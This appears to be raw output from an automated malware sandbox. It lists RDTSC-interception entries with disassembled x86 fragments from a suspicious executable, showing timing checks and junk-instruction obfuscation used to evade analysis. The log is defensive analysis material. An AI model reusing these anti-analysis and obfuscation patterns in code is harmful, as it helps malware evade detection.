                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AD0AA second address: 5AD0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AD393 second address: 5AD39C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AD608 second address: 5AD61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FC69CB9B4A6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AD61B second address: 5AD61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AD8C1 second address: 5AD8F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B1h 0x00000007 jmp 00007FC69CB9B4B4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jne 00007FC69CB9B4A8h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AD8F6 second address: 5AD8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 56DB56 second address: 56DB5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 56DB5E second address: 56DB6E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edi 0x00000008 js 00007FC69CE9FC5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 56DB6E second address: 56DB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FC69CB9B4AEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AE3FB second address: 5AE402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B2ABC second address: 5B2AC6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC69CB9B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B2FE2 second address: 5B2FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B20D3 second address: 5B20D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B20D7 second address: 5B20DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B20DD second address: 5B20E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B20E1 second address: 5B20F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FC69CE9FC58h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B3345 second address: 5B3353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4AAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5802B6 second address: 5802BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5802BC second address: 5802C6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC69CB9B4A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B8FBC second address: 5B8FC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B8FC8 second address: 5B8FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B8FCE second address: 5B8FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B8FD2 second address: 5B8FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B8FD6 second address: 5B8FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B9290 second address: 5B92BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007FC69CB9B4A6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC69CB9B4B6h 0x00000014 popad 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B92BD second address: 5B92C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B92C1 second address: 5B92D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B92D6 second address: 5B92F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC69CE9FC68h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B972A second address: 5B9739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FC69CB9B4A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B9739 second address: 5B973D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B973D second address: 5B9741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B9741 second address: 5B9747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BCFF1 second address: 5BCFF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BD1BD second address: 5BD1C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BD1C7 second address: 5BD1D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC69CB9B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BD58A second address: 5BD58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDA97 second address: 5BDABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC69CB9B4A6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 mov dword ptr [ebp+122D29D1h], esi 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC69CB9B4AEh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDC78 second address: 5BDC7E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDC7E second address: 5BDC85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDE21 second address: 5BDE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDFCE second address: 5BDFD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BE05E second address: 5BE070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69CE9FC5Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C0606 second address: 5C060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C1399 second address: 5C13AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FC69CE9FC5Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C10A7 second address: 5C10AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C13AF second address: 5C13B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C13B4 second address: 5C13B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C350E second address: 5C351B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C48A6 second address: 5C48AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C3D09 second address: 5C3D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C45F3 second address: 5C4605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4AEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C48AA second address: 5C48B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C4605 second address: 5C4609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C48B4 second address: 5C4937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FC69CE9FC58h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 call 00007FC69CE9FC5Ah 0x00000027 jmp 00007FC69CE9FC5Fh 0x0000002c pop esi 0x0000002d or dword ptr [ebp+122D1ED4h], edx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 pushad 0x00000039 mov eax, 0E362597h 0x0000003e jmp 00007FC69CE9FC64h 0x00000043 popad 0x00000044 jmp 00007FC69CE9FC5Eh 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C4937 second address: 5C493B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C493B second address: 5C4941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C6534 second address: 5C6542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jo 00007FC69CB9B4A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C756D second address: 5C7572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C9539 second address: 5C9544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC69CB9B4A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C7572 second address: 5C7578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C766A second address: 5C7673 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CACA8 second address: 5CAD40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC69CE9FC5Bh 0x0000000c nop 0x0000000d sub dword ptr [ebp+122D1D9Ah], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FC69CE9FC58h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov di, 1014h 0x00000038 mov bl, 6Dh 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 adc di, 6897h 0x00000046 mov edi, 6C2BDC45h 0x0000004b mov eax, dword ptr [ebp+122D07FDh] 0x00000051 mov bl, al 0x00000053 push FFFFFFFFh 0x00000055 call 00007FC69CE9FC63h 0x0000005a sub edi, dword ptr [ebp+122D2F5Dh] 0x00000060 pop ebx 0x00000061 sub edi, dword ptr [ebp+122D1DC6h] 0x00000067 push eax 0x00000068 je 00007FC69CE9FC6Eh 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FC69CE9FC60h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CCB53 second address: 5CCBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FC69CB9B4ACh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e jmp 00007FC69CB9B4ABh 0x00000013 pop ebx 0x00000014 nop 0x00000015 mov edi, dword ptr [ebp+122D2198h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007FC69CB9B4A8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 movzx edi, ax 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FC69CB9B4A8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov bx, ax 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c jns 00007FC69CB9B4ACh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CBBB9 second address: 5CBBC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CCDC1 second address: 5CCDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007FC69CB9B4A6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CCDD4 second address: 5CCDDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CDE46 second address: 5CDE4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CEB2B second address: 5CEBBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC69CE9FC5Ah 0x0000000f nop 0x00000010 push esi 0x00000011 mov edi, 1D4841EFh 0x00000016 pop edi 0x00000017 mov ebx, dword ptr [ebp+122D32CEh] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FC69CE9FC58h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007FC69CE9FC58h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 jbe 00007FC69CE9FC5Ch 0x0000005b or dword ptr [ebp+122D1C9Eh], edi 0x00000061 push eax 0x00000062 pushad 0x00000063 pushad 0x00000064 jp 00007FC69CE9FC56h 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CEBBD second address: 5CEBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC69CB9B4B2h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CDE4A second address: 5CDE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CDE54 second address: 5CDE65 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC69CB9B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CDE65 second address: 5CDE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CFCAE second address: 5CFCC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CED13 second address: 5CED2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CED2B second address: 5CEDE5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CB9B4B8h 0x00000008 jmp 00007FC69CB9B4B2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+122D37A5h] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007FC69CB9B4A8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov edi, dword ptr [ebp+122D217Dh] 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 pushad 0x00000045 stc 0x00000046 push ebx 0x00000047 jl 00007FC69CB9B4A6h 0x0000004d pop esi 0x0000004e popad 0x0000004f mov eax, dword ptr [ebp+122D0C35h] 0x00000055 movsx edi, ax 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push edi 0x0000005d call 00007FC69CB9B4A8h 0x00000062 pop edi 0x00000063 mov dword ptr [esp+04h], edi 0x00000067 add dword ptr [esp+04h], 0000001Ch 0x0000006f inc edi 0x00000070 push edi 0x00000071 ret 0x00000072 pop edi 0x00000073 ret 0x00000074 push eax 0x00000075 pushad 0x00000076 jmp 00007FC69CB9B4B5h 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FC69CB9B4B0h 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D0C33 second address: 5D0CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FC69CE9FC58h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 pushad 0x00000027 jl 00007FC69CE9FC58h 0x0000002d pushad 0x0000002e popad 0x0000002f cld 0x00000030 popad 0x00000031 push 00000000h 0x00000033 mov ebx, dword ptr [ebp+122D1DBFh] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FC69CE9FC58h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 jmp 00007FC69CE9FC5Ah 0x0000005a push eax 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D0CAC second address: 5D0CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D1CA3 second address: 5D1CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
